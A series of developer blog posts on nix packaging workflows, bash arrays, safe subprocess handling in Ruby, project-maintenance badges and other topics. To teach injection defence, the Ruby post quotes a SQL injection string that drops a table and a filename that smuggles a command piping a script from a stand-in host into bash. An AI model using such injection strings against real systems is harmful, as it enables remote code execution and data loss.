This one may be quite uncommon, but I’ve ended up running into it a lot. The scenario is that I have some package base, and package app which depends on base. I want to either add a feature or fix something broken in app, but it turns out this requires fixes to either the source code or the nix expression for base. Now you can’t just make changes in one repo, but you need to build & integrate changes across two (or on a bad day, a whole handful of) projects.

Attempts I’ve made in the pursuit of a perfect workflow

You could probably skip to the end if you just want to know where I’m at now, but I think it often helps to explain the journey, so you know what problem I’m trying to solve, what attempts I’ve made that didn’t work out well enough, and why.

Step 1: Nothing fancy

When developing a nix expression, use only public, tagged archives.

This is fine for a long-running or third-party project, where you don’t need (nor have access) to make changes to the project itself. All you’re doing is wrapping it up in a nix expression, and updates to your nix expression come after upstream source code releases.

However, what about when the upstream project is your project? And what if you want to make sure your nix expression works as expected before you release a new version, so that you can fix anything which is broken? I really want to be able to test changes that I make end-to-end, and that includes testing that it’ll actually work in nix.

Another awkward issue is that you typically need two expressions - a default.nix which can be called with nix-build, and a myPackage/default.nix which accepts its dependencies as arguments. This typically means default.nix just does a callPackage on myPackage/default.nix, but this is a piece of boilerplate you need in each project.

Problems:

Every change to the source code must be versioned, tagged, pushed and released before you can update or test your nix derivation. This is extremely limiting for iterative development, as you may end up publishing a number of broken versions because you haven’t tested them.

Step 2: Scripted updates

Even when you’re doing the simplest possible thing, bumping a package version in nix is kind of tedious. For a typical github-hosted package you’ll need to update the rev attribute to the new version tag, but then you also need to update the sha256. It’s not hard, but it’s pretty annoying and clunky - the more you do it, the more convinced you become there must be a better way.

The straightforward way to automate updating source code (nix is a programming language, not a data format) is typically to extract the automatable bit into its own, simple file format. For example, if I was generating some data for a python program I wouldn’t try to modify python source code in-place, but I’d instead generate a JSON file, then use python’s JSON support to load in that file.

The same can be done with nix - we can store the arguments to fetchFromGitHub in a JSON file, and import that from our nix expression. It’s pretty easy to write a program to read & update a JSON file without needing to be able to edit nix source code. So I did, and it’s called nix-update-source. After much debate, I finally got it merged only to have it reverted a week later by edolstra (the creator of nix himself!) because he disagreed with the approach :(
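To make the “generate data, not source code” idea concrete, here’s a minimal sketch of the updating half. This is not how nix-update-source is implemented; bump_source and the file layout are hypothetical, and only the rev and sha256 attribute names come from the text above. On the nix side, such a file can be loaded with builtins.fromJSON (builtins.readFile ./src.json).

```ruby
require 'json'

# Hypothetical helper: rewrite the "rev" and "sha256" entries of a JSON file
# holding fetchFromGitHub arguments, leaving every other key untouched.
def bump_source(json_path, rev:, sha256:)
  attrs = JSON.parse(File.read(json_path))
  updated = attrs.merge('rev' => rev, 'sha256' => sha256)
  # Pretty-print so the file stays readable and diffs stay small.
  File.write(json_path, JSON.pretty_generate(updated) + "\n")
  updated
end
```

The point is that the program never has to parse or edit nix syntax: it only touches plain data.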

So I ended up adding the option to modify nix source code inline (instead of generating JSON) using a hacky regex-based approach. For derivations that need to be accepted by nixpkgs, this is the best option to avoid causing a stink.

Bonus tip: you can add an updateScript attribute to embed your update process into each package itself (here’s an example), and use nix-shell maintainers/scripts/update.nix --argstr package MY_PACKAGE to invoke it.

Problems:

This is an improvement, but (as in Step 1) it still requires all changes go through the release process before you can test them.

Step 3: Anonymous git SHAs

Rather than fetching a specific git tag, you can use fetchgit to fetch a specific commit by its SHA. This means you can push commits to some testing branch, and use that to test out changes to your nix expression. When you’re happy, squash / rebase / merge the changes and update your commit to the published version.

Problems:

You still need to push your commits somewhere public (e.g. github), so if you’re doing a lot of back and forth you’ll be committing / amending a commit, pushing, and then updating your src attribute before you can test the new version.
People push back against using fetchgit in nixpkgs proper, since it’s less efficient than fetchFromGitHub (you’re cloning a full repo and depending on git, rather than fetching a single tarball). And it’s hard to justify, since each of your updates are to published versions, it’s only the work-in-progress versions which require anonymous commits.
You’ll want to script this somehow, because forgetting to update the commit ID or digest will silently run your old code instead of the code you think you’re testing.
You need to manage multiple branches if you don’t want testing commits going to master, and remember to update your commit ID and digest after merging / rebasing.

Step 4: Add a second derivation which uses a local tarball

This technique involves multiple nix expressions - one for the local tarball version, and one for the official published version. You can go about this in a few ways:

Option 1: use overrideDerivation to inject your local source, e.g.:

# local.nix
with import <nixpkgs> {};
lib.overrideDerivation (callPackage ./default.nix {}) (orig: {
	src = ./local.tgz;
})

Option 2: inject src as part of a second set of arguments. e.g:

# build.nix
{ stdenv, lib, curl, python }:
{ src, version }:
stdenv.mkDerivation {
	inherit src version;
	# ...
}

Option 2 is nice from an engineering perspective - there’s no “default” src, you have to explicitly provide one. When using Option 1 it’s easy to accidentally reference src in a way that overrideDerivation would be unable to intercept (e.g. by referencing it in your buildPhase directly), which ends up with very confusing issues.

I did actually get away with this. But not without sideways glances from nixpkgs maintainers about it being weird - it’s certainly not idiomatic.

Problems:

You still need to script the creation of a tarball somehow. I came up with a handy script, but it assumes you’re using the gup build system and I have to copy it into every project.
You need multiple nix expressions (local and published), which can get confusing.

A third option is just to use ./. as the source, skipping the whole tarball business. But I don’t like that, because:

it’s unnecessarily slow and wastes disk space to copy the whole directory into a new store location on every build, including ignored files (not much fun with hundreds of megabytes of node_modules or built VM images)
now your derivation needs to handle src being either a directory or a tarball. It’s kind of awkward.

Step 5: Use local tarballs and environment variables

The trouble with having a separate nix expression for your local version is that it’s not used by anyone else. Let’s say I have a project b which depends on a. I need to add a feature or fix an issue with b, but that also requires altering a in order to support that feature / fix.

If I’m building a off a local tarball in local.nix, project b won’t be able to see that since it’s using the official expression for a (which lives in nixpkgs, or is perhaps fetched from git). I could modify a temporarily to use the local.nix version instead, but that’s an awkward thing to juggle (and remember not to commit), especially when there are more than just two packages involved, and when this is a common part of your workflow. And if a is fetched from git instead of living in nixpkgs, then I’d also need to publish my changes before I can use them in b. And then what if I have a package c which wants to use my local modifications to both a and b?

So I started introducing environment variables to switch between published and development versions. e.g. each project depending on opam2nix would respect an $OPAM2NIX_DEVEL variable which caused it to import that derivation instead of the published opam2nix. I could then set this variable while testing changes, and not worry about this change accidentally making its way into my source code.

Problems:

Similar to “Step 4”, plus more complexity - even I get confused as to what version of which packages was being used where.
Nobody wants this in nixpkgs, it’s ugly and weird.
I don’t think it would even work for a multi-user setup.

Step 6: nix-pin for development, nix-update-source for releases

a.k.a hopefully the end of this journey?

I have built what I think is a pretty workable solution for local testing while also keeping your derivations completely idiomatic for easy acceptance in nixpkgs.

The development tool is called nix-pin, and it’s a small, generic tool for splicing local checkouts of a project into nixpkgs in an unobtrusive way. You can read the readme for the full details, but the basic workflow is:

checkout a project to work on (which contains its own nix expression)
add this project as a pin - you give it a name, a path, and the path to the nix expression inside the repo

You can now use nix-pin build / nix-pin shell instead of nix-build / nix-shell, to run a version of nixpkgs where the pins on your system are automatically spliced into nixpkgs. You can explicitly update a pin to include all uncommitted changes in your working directory, or pin a project to a specific git SHA. If you’re building a pinned package you’ll get the pinned version, and if you’re building any package that depends on a pinned package¹, it’ll be the pinned version which is injected.

When it comes time to actually release commits that you’ve tested with nix-pin, you can use nix-update-source (although you don’t have to if you have your own release workflow).

It’s kind of simple when you describe it, but the big advantage is that your nix expressions don’t need to be aware of nix-pin. Your nix expressions stay idiomatic for easy inclusion in nixpkgs, and it already works with any idiomatic package definition you’ll find in nixpkgs.

nix-pin is still experimental, and there’s a chance it might break under certain awkward cases. But I think the idea is sound, and I’d love to see it get more adoption within the community, because I really think it can make development with nix much less painful.

¹ If you’re wondering how that’s possible, the actual rule used is to substitute a pinned derivation whenever an argument whose name matches that pin’s name is provided by callPackage. This works out of the box for the huge majority of derivations.

Bash arrays and `set -u`

2016-09-17T00:00:00+10:00

Often you need to progressively build up a set of commandline arguments in bash, like so:

FLAGS=""
if [ -n "$LOGFILE" ]; then
  FLAGS="$FLAGS --log $LOGFILE"
fi
someprogram $FLAGS ...

This usually works, but is a bit rubbish:

this will break if $LOGFILE has a space in it, because bash will split it into multiple arguments
adding a flag is kind of tedious with the FLAGS="$FLAGS ..." boilerplate
$FLAGS ends up with a leading space, which is entirely fine but still feels ugly

Arrays solve these issues nicely. They can store elements with spaces, and there’s a nice append syntax:

FLAGS=()
if [ -n "$LOGFILE" ]; then
  FLAGS+=(--log "$LOGFILE")
fi
someprogram "${FLAGS[@]}" ...

You need to remember the weird "${VAR[@]}" syntax, but you get used to that (writing "$@" to pass along “all of this script’s arguments” is the same idea applied to the positional arguments, which may help you remember).

Problem: “there’s no such thing as an empty array”

The problem is that in bash, an empty array is considered to be unset. I can’t imagine any reason why this should be true, but that’s bash for you. My problem is that I always use set -u in scripts I write, so that a command will fail if I reference a variable which doesn’t exist (just like a real programming language). But in bash, this will fail:

$ set -u
$ FLAGS=()
$ echo "${FLAGS[@]}"
bash: FLAGS[@]: unbound variable

Ugh.

The solution is even more weird bash syntax:

$ echo ${FLAGS[@]+"${FLAGS[@]}"}

(thanks, Stack Overflow)

Which roughly translates to “if FLAGS[@] is set, then insert the value of FLAGS[@], otherwise expand to nothing”.

Note the placement of the quotes - quoting the first instance of ${FLAGS[@]} will lead to an empty string argument (instead of no argument) if $FLAGS is empty. And failing to quote the second instance of ${FLAGS[@]} will mean it breaks arguments on spaces, which was the whole reason we used an array in the first place.

One more trick in your bag of weird bash tricks

Depending on your outlook, this is either another useful trick to help you write more robust bash, or yet another example of how bash actively discourages decent programming practices, highlighting how you really really really shouldn’t use bash for anything nontrivial.

Running a child process in Ruby (properly)

2016-08-02T00:00:00+10:00

(cross-posted on the Zendesk Engineering blog)

We use Ruby a lot at Zendesk, and mostly it works pretty well. But one thing that sucks is when it makes the wrong solution easy, and the right solution not just hard, but hard to even find.

Spawning a process is one such scenario. Want to spawn a child process to run some system command? Easy! Just pick the method that’s right for you:

`backticks`
%x[different backticks]
Kernel.system()
Kernel.spawn()
IO.popen()
Open3.capture2, Open3.capture2e, Open3.capture3, Open3.popen2, Open3.popen2e, Open3.popen3

… and that’s ignoring the more involved options, like pairing a Kernel#fork with a Kernel#exec, as well as the many different Open3.pipeline_* functions.

What are we doing here?

Often enough, you want to run a system command (i.e. something you might normally run from a terminal) from your Ruby code. You might be running a command just for its side effects (e.g. chmod a file), or you might want to use the output of the command in your code (e.g. tar -tf to list the contents of a tarball). Most of the above functions will work, but some of them are better than others.

In order to narrow this down, I’m going to make some assumptions:

(aside: there are pure-Ruby ways to perform the tasks in these examples which are likely to be more secure and simpler than invoking an external program written in C. But for clarity I’ve chosen simple examples over realistic ones)

Assumption 1: let’s not get hacked

You’ve probably heard of SQL injection - if you build up a string like "select * from users where name = '#{username}'", someone will eventually come along and submit a form where username="'; drop table users; --'".

Whenever you include untrusted data as part of code, you’re likely to see similar issues. SQL is code, which is why we need to cleanly separate SQL commands (trusted) from SQL values (untrusted). This can be seen in ActiveRecord with examples like User.find_by(['name = ?', params[:username]]). This doesn’t just smush all the data together, but instead gives it to the SQL processor in a way that it can distinguish code from data.

Of course, sh (or bash) is a very powerful language - if you make similar errors when invoking subcommands, you can easily allow hackers to do all sorts of nasty things. Consider some code to figure out the dimensions of an uploaded image. One way to do that in ruby (with imagemagick installed) is:

dimensions = `identify -format '%w x %h' #{filename}`

This will probably work, until someone decides to upload an image named '; curl pwnme.example.com | bash ;#.jpg'

Oh dear, I hope that domain doesn’t host a malicious script of some sort. And I really hope your account doesn’t have passwordless sudo.

Even if your application is only accessible to users you trust, this is still bad code. For example, it will fall over as soon as someone uses a filename with a space in it. Encoding data correctly isn’t just a matter of security - insecure code usually turns out to be buggy as well! And “only trusted users can trigger this code” is one of those statements which can cause an avalanche of curse words months or years down the line when that silently (and then loudly) stops being true.

The solution for running a command is simple: rather than providing a string to be executed by /bin/sh, we give the command and its arguments directly as an array of strings. No splitting on spaces, no escaping quotes, no special characters whatsoever. So instead of:

"ls -l #{directory}"

We want to provide:

['ls', '-l', directory]

As a bonus, this cuts out the sh interpreter altogether. This saves us the tedious work of applying sh escaping rules, running a mostly useless sh process, and conveniently sidesteps exploits like the shellshock bug.
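Here’s a small sketch of that difference, under some assumptions: the hostile filename is made up (modelled on the one above), and a child ruby process that prints its first argument stands in for a real tool like identify. The helper name is hypothetical.

```ruby
require 'open3'
require 'rbconfig'

# A hostile "filename", modelled on the example above (hypothetical).
hostile = "'; echo pwned ;#.jpg"

# Stand-in for a real tool: a child ruby process that prints its first
# argument back. Because the command is given as separate strings,
# no shell ever gets a chance to parse the filename.
def first_argument_seen_by_child(arg)
  stdout, status = Open3.capture2(RbConfig.ruby, '-e', 'print ARGV[0]', arg)
  raise "child failed (#{status})" unless status.success?
  stdout
end

seen = first_argument_seen_by_child(hostile)
puts(seen == hostile ? "argument arrived intact" : "argument was mangled")
```

The quotes, semicolons and spaces are just bytes in a single argument; nothing needs escaping because nothing is interpreting them.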

Assumption 2: silent errors are bad errors

I have a vendetta against all forms of unhandled error. They pop up in a lot of places:

sloppy C code (whenever you forget to check for errors explicitly)
a startling amount of bash scripting (unless you set -eo pipefail or meticulously check for failed commands with $?)
do_something(obj) rescue nil

That last one’s at least explicit about it, but it’s still a big hammer to swing - maybe you expect do_something(obj) to fail with a certain error when obj is nil. But what if someone introduces some other bug into do_something which fails for a completely different reason? You’re much better off either checking for the nil up front, or rescuing only very specific exceptions.
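As a rough illustration of rescuing only the specific exception you expect, here’s a sketch using a made-up parse_port helper (not from any library). It treats “not a number” as an expected case, but lets every other failure surface:

```ruby
# Hypothetical helper: return the port as an Integer, or nil when the text
# is not a valid number. Only ArgumentError (what Integer() raises for
# malformed strings) is rescued; anything else still propagates.
def parse_port(text)
  Integer(text)
rescue ArgumentError
  nil
end

p parse_port("8080")
p parse_port("http")
```

Passing nil by mistake raises a TypeError rather than quietly returning nil, which is exactly the kind of bug a blanket rescue nil would have hidden.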

So if you want to run a shell command, you’d better be checking that the command actually returned with a successful exit status. If you think “this could never fail”, do it anyway. If you’re right, you’ve made sure of it and may proceed to feel smug. If you’re wrong, you might save yourself mild annoyance, hours of debugging, or catastrophic data loss. It’s a win-win.

Elimination round

OK, so firstly anything that uses a plain sh string is out. That knocks off the two most convenient options:

backticks
%x[backticks in a funny hat]

The remaining functions accept either a string or an array, so you need to be diligent in making sure you give them an array.

Now, which of these has the best error handling?

Firstly, a lot of these don’t return a status directly. They set the global $? object. This is mostly reliable, but kind of icky (it’s a global!)

On the plus side, it’s a thread-safe global - ruby plays some tricks to make sure it always refers to the last process for this thread.

But it’s still ugly, and while writing up some examples for this post I discovered a sneaky issue with it that I’d never encountered before: it doesn’t always mean what you think it means.

Consider this code:

listing = IO.popen(['ls', directory]).read
raise "it failed!" unless $?.exitstatus == 0
return listing

If ls fails (perhaps directory doesn’t exist), what happens? It looks like you’ll get an error, but it turns out that you might get an error or return an empty string, depending on the result of some previous, unrelated command. This is because $? does not get set by IO.popen until you close it. i.e. you would need to do:

io = IO.popen(['ls', directory])
listing = io.read
io.close
raise "it failed!" unless $?.exitstatus == 0
return listing

Which is a subtle difference, and not exactly pretty code. If you pass a block to IO.popen you won’t have this issue because it’ll call close for you, but you’ll need to remember that subtlety.

So although using $? can be done correctly, it’s ugly and it introduces the possibility of sneaky bugs. I’d rather avoid it.
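If you do end up relying on $?, one way to keep the subtlety in a single place is a small wrapper around the block form of IO.popen. This is only a sketch: read_stdout! is a hypothetical name, and the child ruby process stands in for a real command like ls.

```ruby
require 'rbconfig'

# Hypothetical helper: run argv without a shell and return its stdout,
# raising if the child exits unsuccessfully.
def read_stdout!(*argv)
  # The block form closes the pipe when the block returns, and closing is
  # what waits for the child and sets $? for this thread.
  output = IO.popen(argv) { |io| io.read }
  status = $?
  raise "#{argv.first} failed (#{status})" unless status.success?
  output
end

puts read_stdout!(RbConfig.ruby, '-e', 'print "listing"')
```

Reading $? on the very next line after the block keeps the window for an unrelated command to overwrite it as small as possible.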

What are we left with? Just Open3. This is the only option which:

accepts an array of arguments, and
explicitly returns a status object, rather than using $?

One exception is when you just want to run a command, and don’t need to capture its output. For this you can use the humble Kernel.system(), which takes the command and each of its arguments as separate strings and returns a boolean. So you’d use it like this:

system('rm', '-r', directory) or raise "Failed to remove #{directory}"

tl;dr: Common Ruby subprocess patterns

a.k.a enough talk, just tell me what to use!

1: You want to run something, but don’t need its output

system('rm', '-r', directory) or raise "Failed to remove #{directory}"

Protip: if you want to run a command without arguments, you should actually use:

system(["ls", "ls"])

…because otherwise system will take your single string to be a shell string.
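If you’d rather not remember that protip at every call site, a tiny wrapper can always use the two-element form. This is a sketch only: run! and CommandFailed are hypothetical names, and the child ruby process is a stand-in for whatever command you actually want to run.

```ruby
require 'rbconfig'

class CommandFailed < StandardError; end

# Hypothetical helper: run cmd with args, never via a shell, and raise
# unless it exits successfully.
def run!(cmd, *args)
  # The [cmd, cmd] pair (program, argv[0]) forces the no-shell form,
  # even when there are no further arguments.
  result = system([cmd, cmd], *args)
  # system returns nil when the command could not be executed at all,
  # and false when it ran but exited with a non-zero status.
  raise CommandFailed, "could not start #{cmd}" if result.nil?
  raise CommandFailed, "#{cmd} exited unsuccessfully" unless result
  true
end

run!(RbConfig.ruby, '-e', 'exit 0')
```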

2: You want to capture stdout as a string (and inherit `stderr`):

This is the most common case, in my experience.

stdout, status = Open3.capture2('unzip', '-l', zipfile)
raise "unzip failed" unless status.success?

(you can also pass a stdin_data: <string> option if you need to provide some input)
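For example, here’s a sketch of passing stdin_data. The child here is just a ruby one-liner that upcases its input (a stand-in for a real filter command), and upcase_via_child is a hypothetical name:

```ruby
require 'open3'
require 'rbconfig'

# Hypothetical helper: feed text to a child process on stdin and
# return whatever it writes to stdout.
def upcase_via_child(text)
  stdout, status = Open3.capture2(
    RbConfig.ruby, '-e', 'print STDIN.read.upcase',
    stdin_data: text
  )
  raise "child failed (#{status})" unless status.success?
  stdout
end

puts upcase_via_child("hello")
```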

3: You want to capture stdout as a stream:

… because it might be huge, or you want to process each line as it arrives. This allows you to write to stdin as a stream, too.

Open3.popen2('unzip', '-l', zipfile) do |stdin, stdout, status_thread|
	stdout.each_line do |line|
		puts "LINE: #{line}"
	end
	raise "Unzip failed" unless status_thread.value.success?
end

4: You need to inherit `stdin`

This is a tricky edge case to figure out from the open3 docs. Each of the functions in that module supports the same options as Open3#popen3, which says that its options are passed through to Process#spawn, which in turn has lots of options for controlling redirections and file descriptors. Unfortunately, the docs don’t mention one crucial point - whatever redirections you pass will be ignored, because popen3 always overrides the redirection options with its own pipes.

So if you do need to inherit stdin and Kernel#system won’t do, IO.popen may be your only choice. e.g. to inherit stdin and read stdout as a string:

# I don't know why you're piping a zip file into `stdin`,
# but I'm not the judging type...
output = IO.popen(['unzip', '-l', '-'], in: :in) do |io|
	io.read
end
raise "unzip failed" unless $?.success?
puts output

Bonus round: avoiding deadlocks

There’s one more gotcha when it comes to dealing with subprocesses: deadlocks. This can be an issue when you want to process both stdout and stderr of a child. If one of these pipes fills up its OS buffer with unconsumed output, the OS will block the child process until somebody reads that buffered data. But if your parent process is busy waiting for the other stream, you’ll get a deadlock. If you do decide to handle both streams yourself, you’ll need to use threads or select to read from whichever stream has data. But generally the best advice is just to do one of the following:

inherit stderr or redirect it to a file
combine stderr and stdout via Open3.popen2e or something similar
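If you really do need both streams separately, here’s a sketch of the threads approach. capture_both is a hypothetical name, and the child is a ruby one-liner that deliberately writes more to each stream than a typical pipe buffer holds:

```ruby
require 'open3'
require 'rbconfig'

# Hypothetical helper: collect stdout and stderr separately without
# deadlocking, by draining each pipe in its own thread.
def capture_both(*argv)
  Open3.popen3(*argv) do |stdin, stdout, stderr, wait_thread|
    stdin.close
    out_reader = Thread.new { stdout.read }
    err_reader = Thread.new { stderr.read }
    # Both pipes are being drained concurrently, so the child can never
    # block forever on a full buffer.
    [out_reader.value, err_reader.value, wait_thread.value]
  end
end

# Writes 200,000 bytes to each stream.
child_script = '$stdout.write("o" * 200_000); $stderr.write("e" * 200_000)'
out, err, status = capture_both(RbConfig.ruby, '-e', child_script)
puts "stdout: #{out.length} bytes, stderr: #{err.length} bytes, ok: #{status.success?}"
```

Open3.capture3 does this kind of threaded reading for you when you just want both streams as strings, so it’s worth reaching for that before writing your own.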

Epilogue, or “the stdlib sucks, let’s use gems”!

The stdlib does contain everything you need, but it also provides plenty of options to avoid - you need to know what you want and which modules can provide that. If you’re just doing this in one or two places, that’s probably fine.

But if you do enough of this that you’re happy to venture outside the standard library, there are some nice looking libraries which may provide a more consistent solution. In particular stripe’s subprocess library is promising - I haven’t tried it myself, but it’s a direct port of python’s subprocess module, which is one of the best modules I know of for doing this sort of thing. And stripe gets bonus points for explicitly disallowing sh syntax - you must provide an array of arguments.

Software Maintenance and Author Intent

2016-04-17T00:00:00+10:00

or, “I’ve written a lot of software, and now I have regrets”

As time goes on, people write more software. Well, at least I do. And these days, it’s pretty easy to put up everything you’ve created on GitHub or somewhere similar.

But of course, not all software is created equal. That 100-line JS library I created in one day back in 2011 which has seen 3 commits since is probably not going to be as important to me as the primary build tool I use in my own projects, which has implementations in 2 languages, an extensive automated test suite, and which has steadily seen improvements and fixes over the past 2 years with more than 300 commits.

And people usually realise this. Based on project activity, date of recent commits, total number of commits, amount of documentation etc, you can often get a good idea of how healthy a project is. But is that enough?

I’ve had people report bugs in a project where my immediate thought has been “well, this is pretty old and I haven’t used it for years - I’m not surprised it doesn’t work”. Meanwhile I see comments about another project where someone will wonder whether it still works, since it hasn’t been updated in ages. To which my first thought is “of course it still works! It doesn’t need updating because nothing’s wrong with it”.

I’ll try and communicate this less bluntly, but clearly there’s information I (as the author) know that others can’t without asking me - from what others can see, the projects probably look just as healthy as each other.

Why are you publishing it if you don’t care about it?

I don’t want to maintain all the software I’ve ever written. I’ve written plenty of software for platforms or tools I no longer use. I’ve written software to scratch an itch I no longer have, or which I just can’t be bothered keeping up to date with breaking API changes.

I could just abruptly delete each project as I decide it’s not worth maintaining, but that’s both drastic and rude. Maybe it works fine, but I no longer use it. Maybe others still depend on it. Maybe someone else would like to step up and take it over, rather than see it die. Maybe it doesn’t work as-is, but people can learn from reading parts of the code that are still useful. I publish Open Source software because it might be useful to others - deleting it when I no longer have a use for it doesn’t fit with that spirit at all.

Stillmaintained

A while ago, there was this project called “stillmaintained”. It aimed to address the issue of communicating project health directly, by answering the simple question “Is this still maintained?”. Ironically (but perhaps inevitably), stillmaintained itself is no longer maintained, and even the domain registration has lapsed. But I think the problem is an important one.

My solution

I think the constraints are:

It must be dirt easy for the author to manage. If it takes too much effort to update a project’s status, I’ll be too lazy to do it.
The infrastructure itself must be super low maintenance. I don’t want to spend all my time maintaining the thing that tells you if my projects are maintained!

So to solve the issue for my projects, I did the simplest dumbest thing:

I created a few static images with Inkscape.
In a folder that gets synced to this website, I made a bunch of files named <projectname>.png, each of which is a symlink to a status (e.g. ../maintained.png, ../abandoned.png, etc).
I embed that <projectname>.png into the project’s README, documentation, etc.
When I decide that a project’s status has changed, I modify the appropriate symlink.

Now the status for all my projects is managed in one directory, and I can generate a list of active projects with a simple python script. I don’t need to go and edit that project’s README, docs and packaging metadata - it all just points to the same place.
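I used Python for that listing script, but the idea is small enough to sketch in a few lines of Node. This is only an illustration under assumptions: the directory layout is the one described above (<projectname>.png symlinks pointing at ../<status>.png), and the helper names projectStatuses and projectsWithStatus are made up for this example.

```javascript
var fs = require('fs');
var path = require('path');

// Hypothetical helper: map each `<projectname>.png` symlink in `dir`
// to the status it points at (e.g. "../maintained.png" -> "maintained").
function projectStatuses(dir) {
  var statuses = {};
  fs.readdirSync(dir).forEach(function(name) {
    var full = path.join(dir, name);
    if (path.extname(name) !== '.png') return;
    // lstat (not stat) so that we inspect the link itself, not its target
    if (!fs.lstatSync(full).isSymbolicLink()) return;
    var target = fs.readlinkSync(full);
    statuses[path.basename(name, '.png')] = path.basename(target, '.png');
  });
  return statuses;
}

// Hypothetical helper: sorted names of all projects with the given status.
function projectsWithStatus(dir, status) {
  var statuses = projectStatuses(dir);
  return Object.keys(statuses).filter(function(project) {
    return statuses[project] === status;
  }).sort();
}
```

Calling projectsWithStatus(dir, 'maintained') then gives the list of active projects, without touching any individual project's README.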

Here’s an example badge, for abandoned projects:

It’s not fancy. There are no RSS feeds or email notifications when the project status changes. Showing an image containing text is not very accessible, nor very flexible. But it’s the easiest way for me to tell visitors to my projects what my assessment of that project’s health is, which is something I’ve never had the ability to do very well before. And since it’s so low maintenance, I’m hopeful that I’ll actually keep these up to date in the future.

In open source software, the author is under no obligation to maintain or fix anything - it’s there, take it or leave it. That doesn’t tell the full story. I want people to use my code, so just ignoring users and possible contributors because I have no obligation to them is a great way to get a reputation as a terrible project maintainer. At the same time, there’s no way I can fully maintain all the software I’ve ever written, especially as time goes on and that set gets larger. So the best I can do is to try and honestly communicate my intent as part of each project’s public documentation.

Midori Blog: The Error Model

2016-02-19T00:00:00+11:00

For the past few months, Joe Duffy has been blogging about the most interesting aspects of the design and implementation of Midori, a now-abandoned research OS from Microsoft Research, which has been incredibly interesting to follow. I particularly enjoyed the latest article about the error model, but the whole series is worth a read (and a subscribe, since there are more on the way).

(view link)

Low-Poly Wren

2016-02-06T00:00:00+11:00

Well, it’s been a little while (something like 10 years) since I’ve done any 3d rendering. After seeing a bunch of inspirational things recently (particularly caminandes 3 and browsing Fi Silva’s work), I thought I’d crack open Blender and have a go at some low-poly artwork.

Of course, I pretty much had to make a blue wren:

(click for huge wallpaper size)

In terms of picking up Blender after not touching 3D software for a decade, it was actually not too painful. Initially it was frustrating to know what I wanted to do but not remember how to achieve it, but there’s plenty of starter resources out there and after a few hours I was feeling relatively comfortable with the basics. And my faded muscle memory probably worked in my favour, because last time I used Blender I had strong 3DS Max knowledge, making Blender feel weird and alien. But coming at it (relatively) fresh, it’s actually quite easy to get used to, and such an amazing piece of software.

I’m particularly amazed at how straightforward certain highly complex things have become - e.g. the builtin cycles renderer does an excellent (and fast!) job of Global Illumination - I remember pining over Arnold and other specialized renderers while scripting complex dome-light rigs to emulate GI with the standard 3DS Max renderer.

Also physics: just for fun I’ve already made a bunch of “solid object turns into liquid and splats on the ground” animated gifs because it takes literally minutes to set this up and run the simulations in Blender. Last time I tried physics I don’t think I even had access to a liquid sim, the most exciting thing I could do was drape a square cloth over a sphere.

Of course, none of that makes animation or modeling any easier, as those are not something the computer can really help much with. But it’s really encouraging to be able to light a scene and have a pretty result in next to no time, especially as lighting is really not my strong suit. And if I ever need a wren to suddenly dissolve into liquid, I’m all set for that too!

Running gnome-shell nested in a Xephyr window

2016-02-01T00:00:00+11:00

TL;DR: install nix and Xephyr, then try this script.

I’ve worked on a GNOME Shell tiling window extension (shellshape) for 5 years now, since before the first release of gnome-shell. The shell itself is impressively extensible, and it’s pretty amazing that I can distribute a tiling window extension which is just a bunch of JavaScript. But the development process itself has always been awful:

you have to restart your window manager all the time, which typically loses the sizing and workspace affinity of every window, leaving you with a tangled mess of windows
if your extension doesn’t work then you have a broken shell
it is painfully easy to cause a segfault (from JavaScript code :( )
you’d better be editing your code in a tmux session so you can fix it from a VTE
sometimes when restarting the shell, all your DBus-based integrations get messed up so you can’t change volume, use multimedia keys or shutdown
testing against a new gnome-shell version basically means either upgrading your OS or trying to do a fresh install in a VM, which is a whole new layer of annoyance.

Maybe I’m spoiled from working on projects which are easily run in isolation - I bet kernel developers scoff at the above minor inconveniences. But it makes development annoying enough that I dread it, which means I’ll only fix bugs when they get more annoying than development itself.

All of which is to say that this is freakin’ awesome. As of a couple days ago I’ve been able to run the latest version of GNOME Shell (which isn’t packaged for my distro) in a regular window, completely disconnected from my real session, running the development version of shellshape.

Big thanks go to whichever mysterious developers were responsible for fixing whatever gnome-shell / graphics / Xephyr issues have always prevented gnome-shell from running nested (it does now!), and to the nixpkgs folks maintaining the latest GNOME releases so that I can run new versions of GNOME without affecting the rest of my system.

Unfortunately I can’t guarantee it’ll work for you, since this stuff is heavily dependent on your graphics card and drivers, plus it only seems to work with my system version of Xephyr, not the nixpkgs one. But if this interests you, you should definitely give it a go. You’ll need nix and Xephyr. If you don’t want to use nix, you can probably extract what you need from the script to run your system version of gnome-shell in a Xephyr window.

Heads up: new handle

2015-11-28T00:00:00+11:00

Just a quick heads up, in case anyone comes here looking for verification: I’ve changed my twitter & github handle from @gfxmonk to @timbertson.

I don’t have particular plans to rename this site, since that’s a lot more complex and it would break All The Links. But “gfxmonk” was a name I picked when I was big into computer graphics (and not a monk, though it sounded cool at the time). A decade or so later I’m more of an enthusiastic observer when it comes to graphics, and still not all that monk-like. So I figured I’d adopt a handle that was based on my name, since I probably won’t decide to change that any time soon.

Figuring out what transducers are good for (by trying to use them for a bunch of problems in JavaScript)

2015-11-25T00:00:00+11:00

I’ve been aware of transducers for a little while, but haven’t actually used them, or even really felt like I fully grokked what they were good for. They come from the clojure community, but are making their way into plenty of other languages and libraries too. I’ve seen claims that they are a game-changing, breathtaking new concept, which didn’t really square with what they looked like.

So I thought I’d learn more about them by just attempting some plausible but detailed examples with them in JavaScript. If you’ve heard about transducers but aren’t really sure what they’re good for, perhaps this’ll help clarify. And if you’ve never heard of transducers, feel free to take a detour via the clojure documentation.

tl;dr
- So what are transducers?
Let’s transduce some things!
Closing thoughts
Appendix a: More examples
- “Mapping” the values of an object
- Custom iterators

tl;dr

After trying out transducers on a bunch of sample problems, my takeaway is that transducers are:

a neat encapsulation for the usual set of functional transformations (map, filter, reduce, etc)
a common way to represent a transformation to be done later, which leads to:
a way to apply multiple transformations without creating intermediate collections
a decent way to compose asynchronous transformations (compared to vanilla JavaScript efforts)
significantly more complex to understand than map, filter, reduce, etc.

These features are neat, but I wouldn’t call them ground-breaking. And I may be spoiled, but “the ability to use the same transformations on collections of different types (arrays, streams, etc)” isn’t terribly novel - JavaScript is one of the worst high-level languages for dealing with things like lazy or blocking computation. Most other languages can already achieve the majority of these goals using some sort of lazy iterator / collection protocol and plain ol’ map, filter, and reduce.

